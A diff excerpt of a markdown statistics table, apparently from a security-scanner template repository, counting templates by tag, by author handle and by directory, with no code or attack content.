| | | | -| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | -| tech | 360 | princechaddha | 153 | file | 78 | | | | | -| rce | 347 | gy741 | 135 | takeovers | 69 | | | | | -| packetstorm | 292 | arafatansari | 107 | network | 63 | | | | | -| cve2022 | 266 | tess | 85 | iot | 41 | | | | | -| wpscan | 256 | madrobot | 65 | cnvd | 25 | | | | | -| token-spray | 236 | zzeitlin | 64 | miscellaneous | 25 | | | | | -| misconfig | 228 | idealphase | 62 | dns | 17 | | | | | -| cve2020 | 224 | akincibor | 55 | fuzzing | 12 | | | | | -| | 195 | for3stco1d | 49 | ssl | 8 | | | | | -| unauth | 194 | gaurang | 42 | headless | 7 | | | | | -| wp | 188 | philippedelteil | 37 | | | | | | | -| kev | 168 | edoardottt | 36 | | | | | | | -| config | 167 | c-sh0 | 34 | | | | | | | -| cve2018 | 145 | adam crosser | 31 | | | | | | | -| cve2019 | 137 | theamanrawat | 31 | | | | | | | -| joomla | 135 | righettod | 30 | | | | | | | -| default-login | 133 | ice3man | 26 | | | | | | | -| apache | 127 | organiccrap | 24 | | | | | | | -| oast | 127 | ffffffff0x | 22 | | | | | | | -| iot | 125 | techbrunchfr | 21 | | | | | | | -| authenticated | 121 | cckuailong | 18 | | | | | | | -| sqli | 118 | sullo | 17 | | | | | | | -| cve2010 | 111 | pr3r00t | 15 | | | | | | | -| router | 92 | sheikhrishad | 15 | | | | | | | -| files | 92 | johnk3r | 14 | | | | | | | -| redirect | 90 | r3dg33k | 14 | | | | | | | -| login | 89 | milo2012 | 14 | | | | | | | -| network | 81 | tenbird | 13 | | | | | | | -| devops | 75 | random-robbie | 13 | | | | | | | -| takeover | 75 | 0ri2n | 13 | | | | | | | -| token | 74 | sharath | 13 | | | | | | | -| ssrf | 72 | melbadry9 | 12 | | | | | | | -| cve2017 | 71 | suman_kar | 12 | | | | | | | -| cms | 67 | wdahlenb | 11 | | | | | | | -| auth-bypass | 66 | cyllective | 11 | | | | | | | -| file | 65 | dogasantos | 11 | | | | | | | -| oracle | 63 | elsfa7110 | 11 | | | | | | | -| intrusive | 60 | nadino | 10 | | | | | | | -| install | 59 | hackergautam | 10 | | | | | | | -| seclists | 57 | meme-lord | 10 | | | | | | | -| disclosure | 57 | ricardomaia | 10 | | | | | | | -| oss | 52 | random_robbie | 10 | | | | | | | -| cisco | 50 | logicalhunter | 10 | | | | | | | -| cve2016 | 49 | alph4byt3 | 10 | | | | | | | -| google | 48 | oppsec | 9 | | | | | | | -| fileupload | 47 | emadshanab | 9 | | | | | | | -| cve2015 | 47 | 0x240x23elu | 9 | | | | | | | -| adobe | 45 | zh | 8 | | | | | | | -| aem | 42 | aashiq | 8 | | | | | | | -| plugin | 41 | veshraj | 8 | | | | | | | -| cve2014 | 41 | iamthefrogy | 8 | | | | | | | -| hackerone | 39 | that_juan_ | 8 | | | | | | | -| atlassian | 38 | lu4nx | 8 | | | | | | | -| logs | 38 | techryptic (@tech) | 7 | | | | | | | -| vulhub | 38 | kophjager007 | 7 | | | | | | | -| vmware | 38 | amit-jd | 7 | | | | | | | -| debug | 37 | randomstr1ng | 7 | | | | | | | -| tenable | 36 | divya_mudgal | 7 | | | | | | | -| springboot | 35 | harshbothra_ | 7 | | | | | | | -| traversal | 35 | dr_set | 7 | | | | | | | -| injection | 34 | caspergn | 7 | | | | | | | -| jira | 32 | leovalcante | 7 | | | | | | | -| huntr | 31 | gitlab red team | 6 | | | | | | | -| listing | 31 | evan rubinstein | 6 | | | | | | | -| kubernetes | 30 | forgedhallpass | 6 | | | | | | | -| generic | 28 | imnightmaree | 6 | | | | | | | -| dns | 27 | nullfuzz | 6 | | | | | | | -| log4j | 26 | pathtaga | 6 | | | | | | | -| sap | 25 | praetorian-thendrickson | 6 | | | | | | | -| microsoft | 25 | iamnoooob | 6 | | | | | | | -| cnvd | 25 | _0xf4n9x_ | 6 | | | | | | | -| jndi | 23 | __fazal | 6 | | | | | | | -| misc | 23 | rootxharsh | 6 | | | | | | | -| proxy | 23 | puzzlepeaches | 6 | | | | | | | -| aws | 23 | pentest_swissky | 6 | | | | | | | -| fuzz | 22 | clem9669 | 5 | | | | | | | -| php | 22 | nodauf | 5 | | | | | | | -| wp-theme | 21 | panch0r3d | 5 | | | | | | | -| manageengine | 21 | its0x08 | 5 | | | | | | | -| api | 21 | podalirius | 5 | | | | | | | -| zoho | 21 | ganofins | 5 | | | | | | | -| cve2012 | 21 | xelkomy | 5 | | | | | | | -| weblogic | 20 | prajiteshsingh | 5 | | | | | | | -| cloud | 20 | joanbono | 5 | | | | | | | -| k8s | 19 | yanyun | 5 | | | | | | | -| camera | 19 | e_schultze_ | 4 | | | | | | | -| deserialization | 19 | wisnupramoedya | 4 | | | | | | | -| ibm | 19 | defr0ggy | 4 | | | | | | | -| tomcat | 19 | hardik-solanki | 4 | | | | | | | -| cicd | 19 | powerexploit | 4 | | | | | | | -| dlink | 18 | scent2d | 4 | | | | | | | -| gitlab | 18 | 3th1c_yuk1 | 4 | | | | | | | -| firewall | 17 | incogbyte | 4 | | | | | | | -| jenkins | 17 | shine | 4 | | | | | | | -| struts | 17 | dolev farhi | 4 | | | | | | | -| service | 17 | h1ei1 | 4 | | | | | | | -| wavlink | 17 | tanq16 | 4 | | | | | | | -| printer | 16 | r3naissance | 4 | | | | | | | -| ftp | 16 | 0xlittleboy | 4 | | | | | | | -| nginx | 15 | robotshell | 4 | | | | | | | -| xxe | 15 | dadevel | 4 | | | | | | | -| cve2009 | 15 | thomas_from_offensity | 3 | | | | | | | -| fortinet | 15 | andydoering | 3 | | | | | | | -| cve2011 | 15 | hahwul | 3 | | | | | | | -| java | 14 | ph33r | 3 | | | | | | | -| hp | 14 | binaryfigments | 3 | | | | | | | -| domainmod | 14 | fyoorer | 3 | | | | | | | -| android | 14 | unstabl3 | 3 | | | | | | | -| woocommerce | 13 | arcc | 3 | | | | | | | -| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | -| magento | 13 | mr-xn | 3 | | | | | | | -| cve2013 | 13 | splint3r7 | 3 | | | | | | | -| amazon | 13 | swissky | 3 | | | | | | | -| status | 13 | johnjhacking | 3 | | | | | | | -| confluence | 13 | 0w4ys | 3 | | | | | | | -| msf | 13 | dudez | 3 | | | | | | | -| lfr | 13 | emenalf | 3 | | | | | | | -| cve2008 | 13 | atomiczsec | 3 | | | | | | | -| fortigate | 12 | yuzhe-zhang-0 | 3 | | | | | | | -| netgear | 12 | ekrause | 3 | | | | | | | -| drupal | 12 | lark-lab | 3 | | | | | | | -| microweber | 12 | shifacyclewala | 3 | | | | | | | -| ruijie | 12 | davidmckennirey | 3 | | | | | | | -| vpn | 12 | sushantkamble | 3 | | | | | | | -| github | 12 | kh4sh3i | 3 | | | | | | | -| graphql | 12 | alifathi-h1 | 3 | | | | | | | -| netsweeper | 12 | dr0pd34d | 3 | | | | | | | -| backup | 12 | skeltavik | 3 | | | | | | | -| rails | 12 | whoever | 3 | | | | | | | -| mail | 11 | lucasljm2001 | 3 | | | | | | | -| azure | 11 | me9187 | 3 | | | | | | | -| ssl | 11 | jarijaas | 3 | | | | | | | -| backdoor | 11 | ambassify | 3 | | | | | | | -| zyxel | 11 | f1tz | 3 | | | | | | | -| airflow | 11 | mavericknerd | 3 | | | | | | | -| cnvd2021 | 11 | supras | 3 | | | | | | | -| cisa | 11 | impramodsargar | 3 | | | | | | | -| webserver | 11 | fxploit | 3 | | | | | | | -| ruby | 10 | _generic_human_ | 3 | | | | | | | -| dell | 10 | z3bd | 3 | | | | | | | -| coldfusion | 10 | ricardo maia (brainfork) | 2 | | | | | | | -| glpi | 10 | hackerarpan | 2 | | | | | | | -| laravel | 10 | dbrwsky | 2 | | | | | | | -| grafana | 10 | smaranchand | 2 | | | | | | | -| django | 10 | convisoappsec | 2 | | | | | | | -| git | 10 | 0xrudra | 2 | | | | | | | -| jolokia | 10 | uomogrande | 2 | | | | | | | -| spring | 10 | github.com/its0x08 | 2 | | | | | | | -| ssh | 9 | thardt-praetorian | 2 | | | | | | | -| kube | 9 | nkxxkn | 2 | | | | | | | -| zimbra | 9 | 0xcrypto | 2 | | | | | | | -| fastjson | 9 | kre80r | 2 | | | | | | | -| windows | 9 | kiblyn11 | 2 | | | | | | | -| ssti | 9 | paperpen | 2 | | | | | | | -| wso2 | 9 | foulenzer | 2 | | | | | | | -| zabbix | 9 | luci | 2 | | | | | | | -| dedecms | 9 | paradessia | 2 | | | | | | | -| vcenter | 9 | rafaelwdornelas | 2 | | | | | | | -| versa | 9 | clarkvoss | 2 | | | | | | | -| prometheus | 9 | danielmofer | 2 | | | | | | | -| sonicwall | 9 | bananabr | 2 | | | | | | | -| phpmyadmin | 9 | s0obi | 2 | | | | | | | -| iis | 9 | brenocss | 2 | | | | | | | -| headless | 8 | 0xsapra | 2 | | | | | | | -| solarview | 8 | randomrobbie | 2 | | | | | | | -| mirai | 8 | taielab | 2 | | | | | | | -| jetbrains | 8 | canberbamber | 2 | | | | | | | -| solr | 8 | bernardofsr | 2 | | | | | | | -| npm | 8 | x1m_martijn | 2 | | | | | | | -| recon | 8 | dheerajmadhukar | 2 | | | | | | | -| citrix | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| auth | 8 | nvn1729 | 2 | | | | | | | -| cisco-switch | 8 | wa1tf0rme | 2 | | | | | | | -| config-audit | 8 | israel comazzetto dos reis | 2 | | | | | | | -| jboss | 8 | evergreencartoons | 2 | | | | | | | -| scada | 8 | 666asd | 2 | | | | | | | -| symfony | 8 | sy3omda | 2 | | | | | | | -| bucket | 8 | g4l1t0 | 2 | | | | | | | -| elasticsearch | 8 | n-thumann | 2 | | | | | | | -| hms | 8 | 0xnirvana | 2 | | | | | | | -| audit | 8 | joshlarsen | 2 | | | | | | | -| kafka | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| metadata | 8 | redteambrasil | 2 | | | | | | | -| samsung | 7 | hetroublemakr | 2 | | | | | | | -| nodejs | 7 | parth | 2 | | | | | | | -| seeyon | 7 | martincodes-de | 2 | | | | | | | -| detect | 7 | gal nagli | 2 | | | | | | | -| docker | 7 | zomsop82 | 2 | | | | | | | -| maps | 7 | gevakun | 2 | | | | | | | -| go | 7 | udit_thakkur | 2 | | | | | | | -| cnvd2020 | 7 | afaq | 2 | | | | | | | -| ognl | 7 | r12w4n | 2 | | | | | | | -| icewarp | 7 | codexlynx | 2 | | | | | | | -| opencats | 7 | vavkamil | 2 | | | | | | | -| firebase | 7 | notnotnotveg | 2 | | | | | | | -| squirrelmail | 7 | joeldeleep | 2 | | | | | | | -| exchange | 7 | k11h-de | 2 | | | | | | | -| python | 7 | moritz nentwig | 2 | | | | | | | -| druid | 7 | pxmme1337 | 2 | | | | | | | -| blind | 7 | korteke | 2 | | | | | | | -| liferay | 6 | 0xelkomy | 2 | | | | | | | -| vms | 6 | ehsahil | 2 | | | | | | | -| bypass | 6 | kishore-hariram | 2 | | | | | | | -| zhiyuan | 6 | amsda | 2 | | | | | | | -| slack | 6 | nuk3s3c | 2 | | | | | | | -| activemq | 6 | badboycxcc | 2 | | | | | | | -| jetty | 6 | lotusdll | 2 | | | | | | | -| huawei | 6 | cocxanh | 2 | | | | | | | -| moodle | 6 | 0xsmiley | 2 | | | | | | | -| fpd | 6 | mohammedsaneem | 2 | | | | | | | -| bigip | 6 | socketz | 2 | | | | | | | -| ofbiz | 6 | thezakman | 2 | | | | | | | -| lucee | 6 | fabaff | 2 | | | | | | | -| microstrategy | 6 | sbani | 2 | | | | | | | -| cobbler | 6 | geekby | 2 | | | | | | | -| emerge | 6 | ree4pwn | 2 | | | | | | | -| node | 6 | cckuakilong | 2 | | | | | | | -| kubelet | 6 | 0xprial | 2 | | | | | | | -| admin | 6 | myztique | 2 | | | | | | | -| db | 6 | huowuzhao | 2 | | | | | | | -| openvpn | 6 | bp0lr | 2 | | | | | | | -| cache | 6 | true13 | 2 | | | | | | | -| elfinder | 6 | dahse89 | 2 | | | | | | | -| sitecore | 6 | vsh00t | 2 | | | | | | | -| smtp | 6 | v0idc0de | 2 | | | | | | | -| enum | 6 | w4cky_ | 2 | | | | | | | -| jamf | 6 | ajaysenr | 2 | | | | | | | -| artica | 6 | y4er | 2 | | | | | | | -| crlf | 6 | koti2 | 2 | | | | | | | -| thinkphp | 6 | bsysop | 2 | | | | | | | -| opensis | 6 | bing0o | 2 | | | | | | | -| websphere | 6 | d4vy | 2 | | | | | | | -| magmi | 6 | 8arthur | 2 | | | | | | | -| setup | 6 | manas_harsh | 2 | | | | | | | -| rconfig | 6 | z0ne | 2 | | | | | | | -| ecology | 6 | raesene | 2 | | | | | | | -| cockpit | 5 | nagli | 1 | | | | | | | -| gogs | 5 | co0nan | 1 | | | | | | | -| leak | 5 | florianmaak | 1 | | | | | | | -| apisix | 5 | sherlocksecurity | 1 | | | | | | | -| metinfo | 5 | furkansenan | 1 | | | | | | | -| redis | 5 | phyr3wall | 1 | | | | | | | -| filemanager | 5 | aceseven (digisec360) | 1 | | | | | | | -| strapi | 5 | caon | 1 | | | | | | | -| s3 | 5 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| parallels | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| nagios | 5 | streetofhackerr007 | 1 | | | | | | | -| fortios | 5 | mubassirpatel | 1 | | | | | | | -| mongodb | 5 | miroslavsotak | 1 | | | | | | | -| carrental | 5 | charanrayudu | 1 | | | | | | | -| firmware | 5 | husain | 1 | | | | | | | -| fatpipe | 5 | jcockhren | 1 | | | | | | | -| rseenet | 5 | _darrenmartyn | 1 | | | | | | | -| scan | 5 | d0rkerdevil | 1 | | | | | | | -| solarwinds | 5 | h4kux | 1 | | | | | | | -| gocd | 5 | jbertman | 1 | | | | | | | -| storage | 5 | oscarintherocks | 1 | | | | | | | -| keycloak | 5 | intx0x80 | 1 | | | | | | | -| symantec | 5 | zinminphy0 | 1 | | | | | | | -| error | 5 | elder tao | 1 | | | | | | | -| minio | 5 | rojanrijal | 1 | | | | | | | -| rfi | 5 | 0ut0fb4nd | 1 | | | | | | | -| circarlife | 5 | chron0x | 1 | | | | | | | -| alibaba | 5 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| vbulletin | 5 | flag007 | 1 | | | | | | | -| database | 5 | sec_hawk | 1 | | | | | | | -| elastic | 5 | andysvints | 1 | | | | | | | -| prestashop | 5 | notsoevilweasel | 1 | | | | | | | -| 74cms | 5 | _harleo | 1 | | | | | | | -| plesk | 5 | open-sec | 1 | | | | | | | -| awstats | 5 | 0xd0ff9 | 1 | | | | | | | -| avideo | 5 | deena | 1 | | | | | | | -| beyondtrust | 4 | soyelmago | 1 | | | | | | | -| search | 4 | bibeksapkota (sar00n) | 1 | | | | | | | -| horde | 4 | danigoland | 1 | | | | | | | -| gitea | 4 | manuelbua | 1 | | | | | | | -| kibana | 4 | natto97 | 1 | | | | | | | -| telerik | 4 | opencirt | 1 | | | | | | | -| wcs | 4 | sak1 | 1 | | | | | | | -| jellyfin | 4 | imhunterand | 1 | | | | | | | -| voip | 4 | absshax | 1 | | | | | | | -| tikiwiki | 4 | shockwave | 1 | | | | | | | -| hoteldruid | 4 | mesaglio | 1 | | | | | | | -| hashicorp | 4 | adrianmf | 1 | | | | | | | -| oa | 4 | osamahamad | 1 | | | | | | | -| candidats | 4 | 5up3r541y4n | 1 | | | | | | | -| phpinfo | 4 | djoevanka | 1 | | | | | | | -| gnuboard | 4 | iampritam | 1 | | | | | | | -| aspose | 4 | thebinitghimire | 1 | | | | | | | -| typo3 | 4 | francescocarlucci | 1 | | | | | | | -| bmc | 4 | fq_hsu | 1 | | | | | | | -| terramaster | 4 | jas37 | 1 | | | | | | | -| openemr | 4 | yashgoti | 1 | | | | | | | -| artifactory | 4 | sinkettu | 1 | | | | | | | -| rabbitmq | 4 | akash.c | 1 | | | | | | | -| telesquare | 4 | kaizensecurity | 1 | | | | | | | -| cacti | 4 | duty_1g | 1 | | | | | | | -| linkerd | 4 | lingtren | 1 | | | | | | | -| mailchimp | 4 | yuansec | 1 | | | | | | | -| couchdb | 4 | paper-pen | 1 | | | | | | | -| cnvd2019 | 4 | thevillagehacker | 1 | | | | | | | -| kentico | 4 | vzamanillo | 1 | | | | | | | -| axigen | 4 | kiransau | 1 | | | | | | | -| umbraco | 4 | ramkrishna sawant | 1 | | | | | | | -| sophos | 4 | patralos | 1 | | | | | | | -| thinkcmf | 4 | lixts | 1 | | | | | | | -| sql | 4 | carlosvieira | 1 | | | | | | | -| asp | 4 | zsusac | 1 | | | | | | | -| oauth | 4 | b0rn2r00t | 1 | | | | | | | -| ampache | 4 | lethargynavigator | 1 | | | | | | | -| hikvision | 4 | alex | 1 | | | | | | | -| kevinlab | 4 | ggranjus | 1 | | | | | | | -| nexus | 4 | rotembar | 1 | | | | | | | -| photo | 4 | theabhinavgaur | 1 | | | | | | | -| prtg | 4 | miryangjung | 1 | | | | | | | -| springcloud | 4 | vinit989 | 1 | | | | | | | -| adminer | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| panos | 4 | 0xtavian | 1 | | | | | | | -| httpserver | 4 | petruknisme | 1 | | | | | | | -| puppet | 4 | kailashbohara | 1 | | | | | | | -| sonarqube | 4 | ph33rr | 1 | | | | | | | -| hybris | 4 | schniggie | 1 | | | | | | | -| console | 4 | 1nf1n7y | 1 | | | | | | | -| nosqli | 4 | j33n1k4 | 1 | | | | | | | -| resin | 4 | xshuden | 1 | | | | | | | -| stripe | 4 | tim_koopmans | 1 | | | | | | | -| hpe | 4 | ratnadip gajbhiye | 1 | | | | | | | -| ruckus | 4 | secthebit | 1 | | | | | | | -| xmlrpc | 4 | 8authur | 1 | | | | | | | -| paypal | 4 | 0xceeb | 1 | | | | | | | -| caucho | 4 | pascalheidmann | 1 | | | | | | | -| flink | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| zte | 4 | luqman | 1 | | | | | | | -| dropbear | 4 | mah3sec_ | 1 | | | | | | | -| sendgrid | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| cve2007 | 4 | willd96 | 1 | | | | | | | -| sangfor | 4 | ilovebinbash | 1 | | | | | | | -| yeswiki | 4 | exid | 1 | | | | | | | -| hongdian | 4 | mass0ma | 1 | | | | | | | -| phppgadmin | 4 | mantissts | 1 | | | | | | | -| ems | 4 | couskito | 1 | | | | | | | -| roxy | 4 | jrolf | 1 | | | | | | | -| postmessage | 4 | manasmbellani | 1 | | | | | | | -| redmine | 4 | hexcat | 1 | | | | | | | -| vrealize | 4 | lrtk-coder | 1 | | | | | | | -| tenda | 4 | udyz | 1 | | | | | | | -| royalevent | 4 | philippdelteil | 1 | | | | | | | -| netdata | 3 | spac3wh1te | 1 | | | | | | | -| dom | 3 | tirtha | 1 | | | | | | | -| kfm | 3 | undefl0w | 1 | | | | | | | -| ivanti | 3 | izn0u | 1 | | | | | | | -| payara | 3 | ransomsec | 1 | | | | | | | -| ebs | 3 | jeya.seelan | 1 | | | | | | | -| axis | 3 | jteles | 1 | | | | | | | -| linksys | 3 | sshell | 1 | | | | | | | -| ampps | 3 | 0xteles | 1 | | | | | | | -| mantisbt | 3 | w0tx | 1 | | | | | | | -| matrix | 3 | marcos_iaf | 1 | | | | | | | -| cve2005 | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| r-seenet | 3 | ahmetpergamum | 1 | | | | | | | -| zeroshell | 3 | amnotacat | 1 | | | | | | | -| kingsoft | 3 | ipanda | 1 | | | | | | | -| finecms | 3 | daviey | 1 | | | | | | | -| blockchain | 3 | alevsk | 1 | | | | | | | -| modem | 3 | iphantasmic | 1 | | | | | | | -| nortek | 3 | retr02332 | 1 | | | | | | | -| openstack | 3 | blckraven | 1 | | | | | | | -| trendnet | 3 | makyotox | 1 | | | | | | | -| redash | 3 | gboddin | 1 | | | | | | | -| kkfileview | 3 | berkdusunur | 1 | | | | | | | -| lansweeper | 3 | act1on3 | 1 | | | | | | | -| labkey | 3 | 0xceba | 1 | | | | | | | -| elementor | 3 | ohlinge | 1 | | | | | | | -| trixbox | 3 | bywalks | 1 | | | | | | | -| centos | 3 | elouhi | 1 | | | | | | | -| ec2 | 3 | omarkurt | 1 | | | | | | | -| superadmin | 3 | jeya seelan | 1 | | | | | | | -| tableau | 3 | amanrawat | 1 | | | | | | | -| openfire | 3 | dievus | 1 | | | | | | | -| buffalo | 3 | remonsec | 1 | | | | | | | -| nuuo | 3 | tehtbl | 1 | | | | | | | -| graylog | 3 | evolutionsec | 1 | | | | | | | -| fileman | 3 | f1she3 | 1 | | | | | | | -| proftpd | 3 | jbaines-r7 | 1 | | | | | | | -| thinfinity | 3 | hakimkt | 1 | | | | | | | -| processwire | 3 | hakluke | 1 | | | | | | | -| sharepoint | 3 | ooooooo_q | 1 | | | | | | | -| movable | 3 | cookiehanhoan | 1 | | | | | | | -| fuelcms | 3 | s1r1u5_ | 1 | | | | | | | -| digitalrebar | 3 | elitebaz | 1 | | | | | | | -| globalprotect | 3 | regala_ | 1 | | | | | | | -| odoo | 3 | nerrorsec | 1 | | | | | | | -| dotcms | 3 | harshinsecurity | 1 | | | | | | | -| yonyou | 3 | stupidfish | 1 | | | | | | | -| goanywhere | 3 | bad5ect0r | 1 | | | | | | | -| servicenow | 3 | b0yd | 1 | | | | | | | -| pega | 3 | pjborah | 1 | | | | | | | -| webadmin | 3 | ldionmarcil | 1 | | | | | | | -| geoserver | 3 | failopen | 1 | | | | | | | -| zend | 3 | nielsing | 1 | | | | | | | -| geowebserver | 3 | maximus decimus | 1 | | | | | | | -| messaging | 3 | micha3lb3n | 1 | | | | | | | -| pfsense | 3 | evan rubinstien | 1 | | | | | | | -| sugarcrm | 3 | igibanez | 1 | | | | | | | -| octobercms | 3 | pry0cc | 1 | | | | | | | -| dreambox | 3 | furkansayim | 1 | | | | | | | -| eshop | 3 | andirrahmani1 | 1 | | | | | | | -| jeesns | 3 | borna nematzadeh | 1 | | | | | | | -| jupyter | 3 | retr0 | 1 | | | | | | | -| circleci | 3 | bartu utku sarp | 1 | | | | | | | -| thruk | 3 | udinchan | 1 | | | | | | | -| harbor | 3 | nytr0gen | 1 | | | | | | | -| drawio | 3 | kba@sogeti_esec | 1 | | | | | | | -| jfrog | 3 | realexp3rt | 1 | | | | | | | -| subrion | 3 | 0xh7ml | 1 | | | | | | | -| pip | 3 | ok_bye_now | 1 | | | | | | | -| panabit | 3 | ahmed abou-ela | 1 | | | | | | | -| dolibarr | 3 | pratik khalane | 1 | | | | | | | -| log | 3 | juicypotato1 | 1 | | | | | | | -| atom | 3 | justmumu | 1 | | | | | | | -| digitalocean | 3 | mrcl0wnlab | 1 | | | | | | | -| mikrotik | 3 | sickwell | 1 | | | | | | | -| bruteforce | 3 | daffianfo | 1 | | | | | | | -| getsimple | 3 | aresx | 1 | | | | | | | -| mcafee | 3 | rodnt | 1 | | | | | | | -| codeigniter | 3 | geraldino2 | 1 | | | | | | | -| microfocus | 3 | hardik-rathod | 1 | | | | | | | -| qnap | 3 | dawid-czarnecki | 1 | | | | | | | -| bigant | 3 | tea | 1 | | | | | | | -| voipmonitor | 3 | nobody | 1 | | | | | | | -| empirecms | 3 | official_blackhat13 | 1 | | | | | | | -| wordfence | 3 | shreyapohekar | 1 | | | | | | | -| concrete | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| bitrix | 3 | thelicato | 1 | | | | | | | -| bitbucket | 3 | remi gascou (podalirius) | 1 | | | | | | | -| nacos | 3 | viniciuspereiras | 1 | | | | | | | -| pentaho | 3 | erethon | 1 | | | | | | | -| heroku | 3 | dk999 | 1 | | | | | | | -| netlify | 3 | lamscun | 1 | | | | | | | -| ansible | 3 | xstp | 1 | | | | | | | -| telnet | 3 | shivampand3y | 1 | | | | | | | -| intercom | 3 | xeldax | 1 | | | | | | | -| httpd | 3 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openam | 3 | exploitation | 1 | | | | | | | -| teamcity | 3 | sicksec | 1 | | | | | | | -| graph | 3 | zandros0 | 1 | | | | | | | -| consul | 3 | 0h1in9e | 1 | | | | | | | -| synology | 3 | dale clarke | 1 | | | | | | | -| rocketchat | 3 | p-l- | 1 | | | | | | | -| key | 3 | allenwest24 | 1 | | | | | | | -| sentry | 3 | kareemse1im | 1 | | | | | | | -| axis2 | 3 | luqmaan hadia | 1 | | | | | | | -| selenium | 3 | rschio | 1 | | | | | | | -| steve | 3 | hanlaomo | 1 | | | | | | | -| 3cx | 3 | compr00t | 1 | | | | | | | -| sftp | 3 | alexrydzak | 1 | | | | | | | -| unifi | 3 | ahmed sherif | 1 | | | | | | | -| avtech | 3 | ling | 1 | | | | | | | -| actuator | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| facebook | 3 | 0xrod | 1 | | | | | | | -| seagate | 3 | arm!tage | 1 | | | | | | | -| grav | 3 | mhdsamx | 1 | | | | | | | -| mautic | 3 | toufik-airane | 1 | | | | | | | -| dzzoffice | 3 | rubina119 | 1 | | | | | | | -| flexvnf | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| lotus | 3 | arall | 1 | | | | | | | -| httpbin | 3 | breno_css | 1 | | | | | | | -| glassfish | 3 | ola456 | 1 | | | | | | | -| openbmcs | 3 | jaskaran | 1 | | | | | | | -| aptus | 3 | droberson | 1 | | | | | | | -| clusterengine | 3 | pudsec | 1 | | | | | | | -| splunk | 3 | exceed | 1 | | | | | | | -| mobileiron | 3 | narluin | 1 | | | | | | | -| weiphp | 3 | x6263 | 1 | | | | | | | -| smb | 3 | piyushchhiroliya | 1 | | | | | | | -| express | 3 | orpheus | 1 | | | | | | | -| epson | 3 | qlkwej | 1 | | | | | | | -| webmail | 3 | becivells | 1 | | | | | | | -| rackn | 3 | shelld3v | 1 | | | | | | | -| fanruan | 3 | wabafet | 1 | | | | | | | -| hsphere | 3 | c3l3si4n | 1 | | | | | | | -| samba | 3 | megamansec | 1 | | | | | | | -| selea | 3 | skylark-lab | 1 | | | | | | | -| square | 3 | shiar | 1 | | | | | | | -| webmin | 3 | rivalsec | 1 | | | | | | | -| targa | 3 | httpvoid | 1 | | | | | | | -| metabase | 3 | liquidsec | 1 | | | | | | | -| rlm | 3 | prettyboyaaditya | 1 | | | | | | | -| mongo | 3 | unkl4b | 1 | | | | | | | -| cloudflare | 3 | aaronchen0 | 1 | | | | | | | -| influxdb | 3 | viondexd | 1 | | | | | | | -| ranger | 2 | push4d | 1 | | | | | | | -| globaldomains | 2 | yashanand155 | 1 | | | | | | | -| ucmdb | 2 | lark lab | 1 | | | | | | | -| weather | 2 | wlayzz | 1 | | | | | | | -| bigbluebutton | 2 | kabirsuda | 1 | | | | | | | -| sequoiadb | 2 | noamrathaus | 1 | | | | | | | -| cargo | 2 | arr0way | 1 | | | | | | | -| pmb | 2 | affix | 1 | | | | | | | -| netis | 2 | brabbit10 | 1 | | | | | | | -| idea | 2 | af001 | 1 | | | | | | | -| upload | 2 | arjunchandarana | 1 | | | | | | | -| azkaban | 2 | th3.d1p4k | 1 | | | | | | | -| xiaomi | 2 | coldfish | 1 | | | | | | | -| xampp | 2 | noraj | 1 | | | | | | | -| tornado | 2 | apt-mirror | 1 | | | | | | | -| fastcgi | 2 | akshansh | 1 | | | | | | | -| xceedium | 2 | ofjaaah | 1 | | | | | | | -| dokuwiki | 2 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | -| dubbo | 2 | screamy | 1 | | | | | | | -| dlp | 2 | ringo | 1 | | | | | | | -| blesta | 2 | whynotke | 1 | | | | | | | -| webcam | 2 | knassar702 | 1 | | | | | | | -| wapples | 2 | luskabol | 1 | | | | | | | -| pcoip | 2 | bjhulst | 1 | | | | | | | -| exacqvision | 2 | aayush vishnoi | 1 | | | | | | | -| checkpoint | 2 | dhiyaneshdki | 1 | | | | | | | -| password | 2 | anon-artist | 1 | | | | | | | -| novnc | 2 | infosecsanyam | 1 | | | | | | | -| relatedposts | 2 | momen eldawakhly | 1 | | | | | | | -| ldap | 2 | tirtha_mandal | 1 | | | | | | | -| fortiweb | 2 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| matomo | 2 | shifacyclewla | 1 | | | | | | | -| eris | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| cve2006 | 2 | jiheon-dev | 1 | | | | | | | -| forum | 2 | rotemreiss | 1 | | | | | | | -| contao | 2 | jna1 | 1 | | | | | | | -| code42 | 2 | yavolo | 1 | | | | | | | -| synopsys | 2 | elmahdi | 1 | | | | | | | -| favicon | 2 | 2rs3c | 1 | | | | | | | -| eko | 2 | kr1shna4garwal | 1 | | | | | | | -| dos | 2 | zhenwarx | 1 | | | | | | | -| dvwa | 2 | revblock | 1 | | | | | | | -| nasos | 2 | jaimin gondaliya | 1 | | | | | | | -| osticket | 2 | aringo | 1 | | | | | | | -| arcgis | 2 | clment cruchet | 1 | | | | | | | -| webalizer | 2 | queencitycyber | 1 | | | | | | | -| audiocodes | 2 | un-fmunozs | 1 | | | | | | | -| owasp | 2 | kiks7 | 1 | | | | | | | -| books | 2 | majidmc2 | 1 | | | | | | | -| rancher | 2 | _c0wb0y_ | 1 | | | | | | | -| jquery | 2 | alperenkesk | 1 | | | | | | | -| virtua | 2 | bughuntersurya | 1 | | | | | | | -| kong | 2 | calumjelrick | 1 | | | | | | | -| igs | 2 | fopina | 1 | | | | | | | -| horizon | 2 | fmunozs | 1 | | | | | | | -| rockmongo | 2 | ptonewreckin | 1 | | | | | 